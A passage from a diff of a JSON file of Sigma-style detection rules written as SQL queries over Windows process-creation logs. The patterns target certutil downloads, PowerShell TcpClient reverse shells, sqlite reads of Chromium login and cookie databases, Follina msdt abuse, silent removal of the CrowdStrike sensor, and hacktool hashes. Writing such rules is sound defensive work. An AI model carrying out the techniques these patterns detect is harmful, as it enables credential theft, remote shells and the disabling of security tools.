However this action must be always investigated" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('Excel.exe', 'MSACCESS.EXE', 'OneNote.exe', 'POWERPNT.EXE', 'WinWord.exe') OR Description IN ('Microsoft Access', 'Microsoft Excel', 'Microsoft OneNote', 'Microsoft PowerPoint', 'Microsoft Word')) AND NOT ((NewProcessName LIKE '%\\\\EXCEL.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\WindowsSensor.exe%' ESCAPE '\\' AND CommandLine LIKE '% /uninstall%' ESCAPE '\\' AND CommandLine LIKE '% /quiet%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_office_processes.yml" + "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml" }, { - "title": "Suspicious File Downloaded From Direct IP Via Certutil.EXE", - "id": "13e6fe51-d478-4c7e-b0f2-6da9b400a829", - "status": "experimental", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Using Consent and Comctl32 - Process", + "id": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", + "status": "test", + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE 
'%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\werfault.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_certutil_download_direct_ip.yml" + "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml" }, { - "title": "Potential CVE-2022-26809 Exploitation Attempt", - "id": "a7cd7306-df8b-4398-b711-6f3e4935cf16", - "status": "experimental", - "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", - "author": "Florian Roth (Nextron Systems)", + "title": "Malicious Base64 Encoded PowerShell Keywords in Command Lines", + "id": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", + "status": "test", + "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", + "author": "John Lambert (rule)", "tags": [ - "attack.initial_access", - "attack.t1190", "attack.execution", - "attack.t1569.002" + "attack.t1059.001" ], "falsepositives": [ - "Unknown", - "Some cases in which the service spawned a werfault.exe process" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k RPCSS%' ESCAPE '\\')" + 
"SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% hidden %' ESCAPE '\\' AND (CommandLine LIKE '%AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%aXRzYWRtaW4gL3RyYW5zZmVy%' ESCAPE '\\' OR CommandLine LIKE '%IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%JpdHNhZG1pbiAvdHJhbnNmZX%' ESCAPE '\\' OR CommandLine LIKE '%YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%Yml0c2FkbWluIC90cmFuc2Zlc%' ESCAPE '\\' OR CommandLine LIKE '%AGMAaAB1AG4AawBfAHMAaQB6AGUA%' ESCAPE '\\' OR CommandLine LIKE '%JABjAGgAdQBuAGsAXwBzAGkAegBlA%' ESCAPE '\\' OR CommandLine LIKE '%JGNodW5rX3Npem%' ESCAPE '\\' OR CommandLine LIKE '%QAYwBoAHUAbgBrAF8AcwBpAHoAZQ%' ESCAPE '\\' OR CommandLine LIKE '%RjaHVua19zaXpl%' ESCAPE '\\' OR CommandLine LIKE '%Y2h1bmtfc2l6Z%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg%' ESCAPE '\\' OR CommandLine LIKE '%lPLkNvbXByZXNzaW9u%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA%' ESCAPE '\\' OR CommandLine LIKE '%SU8uQ29tcHJlc3Npb2%' ESCAPE '\\' OR CommandLine LIKE '%Ty5Db21wcmVzc2lvb%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA%' ESCAPE '\\' OR CommandLine LIKE '%lPLk1lbW9yeVN0cmVhb%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A%' ESCAPE '\\' OR CommandLine LIKE '%SU8uTWVtb3J5U3RyZWFt%' ESCAPE '\\' OR CommandLine LIKE '%Ty5NZW1vcnlTdHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%4ARwBlAHQAQwBoAHUAbgBrA%' ESCAPE '\\' OR CommandLine LIKE '%5HZXRDaHVua%' ESCAPE '\\' OR CommandLine LIKE 
'%AEcAZQB0AEMAaAB1AG4Aaw%' ESCAPE '\\' OR CommandLine LIKE '%LgBHAGUAdABDAGgAdQBuAGsA%' ESCAPE '\\' OR CommandLine LIKE '%LkdldENodW5r%' ESCAPE '\\' OR CommandLine LIKE '%R2V0Q2h1bm%' ESCAPE '\\' OR CommandLine LIKE '%AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A%' ESCAPE '\\' OR CommandLine LIKE '%QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA%' ESCAPE '\\' OR CommandLine LIKE '%RIUkVBRF9JTkZPNj%' ESCAPE '\\' OR CommandLine LIKE '%SFJFQURfSU5GTzY0%' ESCAPE '\\' OR CommandLine LIKE '%VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA%' ESCAPE '\\' OR CommandLine LIKE '%VEhSRUFEX0lORk82N%' ESCAPE '\\' OR CommandLine LIKE '%AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA%' ESCAPE '\\' OR CommandLine LIKE '%cmVhdGVSZW1vdGVUaHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA%' ESCAPE '\\' OR CommandLine LIKE '%NyZWF0ZVJlbW90ZVRocmVhZ%' ESCAPE '\\' OR CommandLine LIKE '%Q3JlYXRlUmVtb3RlVGhyZWFk%' ESCAPE '\\' OR CommandLine LIKE '%QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA%' ESCAPE '\\' OR CommandLine LIKE '%0AZQBtAG0AbwB2AGUA%' ESCAPE '\\' OR CommandLine LIKE '%1lbW1vdm%' ESCAPE '\\' OR CommandLine LIKE '%AGUAbQBtAG8AdgBlA%' ESCAPE '\\' OR CommandLine LIKE '%bQBlAG0AbQBvAHYAZQ%' ESCAPE '\\' OR CommandLine LIKE '%bWVtbW92Z%' ESCAPE '\\' OR CommandLine LIKE '%ZW1tb3Zl%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml" + "filename": "proc_creation_win_powershell_hidden_b64_cmd.yml" }, { - "title": "SQLite Chromium Profile Data DB Access", - "id": "24c77512-782b-448a-8950-eddb0785fc71", + "title": "Potential Arbitrary Command Execution Using Msdt.EXE", + "id": "258fc8ce-8352-443a-9120-8a11e4857fa5", "status": "experimental", - "description": "Detect usage of the \"sqlite\" binary to query databases in Chromium-based browsers for potential data stealing.", - "author": "TropChaud", + "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen 
in the follina (CVE-2022-30190) vulnerability", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1539", - "attack.t1555.003", - "attack.collection", - "attack.t1005" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'SQLite' OR (NewProcessName LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Opera Software\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ChromiumViewer\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%Login Data%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Web Data%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_sqlite_chromium_profile_data.yml" - }, - { - "title": "Potential Powershell ReverseShell Connection", - "id": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", - "status": "stable", - "description": "Detects usage of the \"TcpClient\" class. Which can be abused to establish remote connections and reverse-shells. 
As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell.", - "author": "FPT.EagleEye, wagga", - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "falsepositives": [ - "Administrative might use this function to check network connectivity" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '% System.Net.Sockets.TCPClient%' ESCAPE '\\' AND CommandLine LIKE '%.GetBytes%' ESCAPE '\\' AND CommandLine LIKE '%.Write%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '%IT\\_BrowseForFile=%' ESCAPE '\\' OR (CommandLine LIKE '% PCWDiagnostic%' ESCAPE '\\' AND (CommandLine LIKE '% /af %' ESCAPE '\\' OR CommandLine LIKE '% -af %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_reverse_shell_connection.yml" + "filename": "proc_creation_win_msdt_arbitrary_command_execution.yml" }, { - "title": "Shell32 DLL Execution in Suspicious Directory", - "id": "32b96012-7892-429e-b26c-ac2bf46066ff", - "status": "experimental", - "description": "Detects shell32.dll executing a DLL in a suspicious directory", - "author": "Christian Burkard (Nextron Systems)", + "title": "Ping Hex IP", + "id": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", + "status": "test", + "description": "Detects a ping command that uses a hex encoded IP address", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.011" + "attack.t1140", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID 
= '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_rundll32_shell32_susp_execution.yml" - }, - { - "title": "Suspicious Hacktool Execution - Imphash", - "id": "24e3e58a-646b-4b50-adef-02ef935b9fc8", - "status": "experimental", - "description": "Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Legitimate use of one of these tools" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', 
'959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', 
'3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b') OR (Hashes LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE 
'\\' OR Hashes LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' AND CommandLine LIKE '%0x%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_execution_via_imphashes.yml" + "filename": "proc_creation_win_ping_hex_ip.yml" }, { - "title": "Potential Snatch Ransomware Activity", - "id": "5325945e-f1f0-406e-97b8-65104d393fff", - "status": "stable", - "description": "Detects specific process characteristics of Snatch ransomware word document droppers", - "author": "Florian Roth (Nextron Systems)", + "title": "MMC Spawning Windows Shell", + "id": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", + "status": "test", + "description": "Detects a Windows command line executable started from MMC", + "author": "Karneades, Swisscom CSIRT", "tags": [ - "attack.execution", - "attack.t1204" - ], - "falsepositives": [ - "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" + "attack.lateral_movement", + "attack.t1021.003" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%shutdown /r /f /t 00%' ESCAPE '\\' OR CommandLine LIKE '%net stop SuperBackupMan%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel 
